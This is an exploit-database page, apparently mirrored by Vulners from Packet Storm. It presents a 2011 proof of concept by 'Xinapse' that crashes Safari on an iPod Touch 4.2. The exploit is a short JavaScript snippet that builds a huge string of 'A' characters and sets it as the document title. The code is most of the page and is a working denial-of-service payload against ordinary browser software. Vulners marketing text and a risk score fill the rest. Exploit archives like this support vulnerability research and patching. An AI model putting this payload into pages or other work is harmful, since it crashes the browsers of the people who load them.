Lucene search
K

Safari On iPod Touch 4.2 Denial Of Service

🗓️ 17 Feb 2011 00:00:00Reported by XinapseType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 20 Views

Safari on iPod Touch 4.2 DOS Buffer Overflo

Code
`#  
# Safari Ipod Touch 4.2 DOS BufferOverflow  
# Causes a crash in the Ipod Touch 4g and then quits the Application  
# Xinapse  
# http://www.iexploit.org  
#  
  
var buffer = "";  
for (var i = 0; i < 50000; i++) {  
buffer += "A";  
}  
var b2 = buffer;  
for (i = 0; i < 5000; i++) {  
b2 += buffer;  
}  
document.title = b2;  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Feb 2011 00:00Current
0.7Low risk
Vulners AI Score0.7
20